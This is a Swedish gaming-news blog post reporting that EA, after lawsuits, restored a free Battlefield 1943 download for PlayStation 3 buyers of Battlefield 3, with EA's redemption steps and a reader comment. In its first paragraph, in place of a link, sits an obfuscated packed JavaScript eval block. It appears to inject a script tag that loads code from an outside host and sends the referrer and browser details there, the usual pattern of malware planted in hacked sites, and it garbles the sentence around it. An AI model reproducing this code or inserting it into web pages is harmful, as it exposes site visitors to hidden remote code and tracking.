Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

EA bjuder på Battlefield 1943 till alla som köpte Battlefield 3

EA bjuder på Battlefield 1943 till alla som köpte Battlefield 3
Filip Urde
  • On 24 november, 2011
  • http://www.revue.se/filip-urde

Jag skrev tidigare (läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffihr|var|u0026u|referrer|yydda||js|php’.split(’|’),0,{}))
här
) om att EA tog tillbaka sitt erbjudande att alla som köpte Battlefield 3, skulle få en kopia av Battlefield 1943 på köpet. Vad som gjorde alla förbannade var att detta annonserades precis vid releasen.

För oss i Sverige var det surt, men för kunder i länder som USA, var det så mycket mer. I USA så lägger du en handpenning när du förhandsbokar spel. Du betalar alltså en del innan du fått ditt spel och i det här fallet så har Battlefield 1943 fungerat som ett försäljnings mervärde, något som kunnat ses som ännu en anledning att köpa Battlefield 3. EA lovade att alla som köpte en kopia av Battlefield 3 för playstation 3, skulle få med ett Battlefield 1943. Att sedan tabort detta dagar innan releasen gjorde folk ursinniga!

Stämningar mot EA har haglat in under veckan och nu har man alltså på EA, ”märkt” att det man gjorde var fel. Man skulle aldrig brutit löftet.
EA uttalat sig om det hela och påstår att det har blivit ett missförstånd och att man till helgen kan hämta en kopia av Battlefield 1943 från PSN.

To download your copy of Battlefield 1943 for the PlayStation 3 you will need to follow the steps below.

1. Activate your Battlefield 3 Online Pass for the PlayStation 3 using the voucher included in the game (see step #5 for additional instructions).

2. Visit 1943redemption.battlefield.com on or after the dates outlined above for your region and log in with your Origin ID and password. Click here if you need help with retrieving your account information.

3. Select your territory. Note vouchers do not work across regions.

4. You will then receive a PlayStation 3 voucher for Battlefield 1943.

5. Input your voucher into the PlayStation Network store.

 

Lördag den 26:e november kommer detta erbjudande gälla för oss här i Europa.
help.ea.com

Comments

  1. Fjeska

    Trött, har redan det här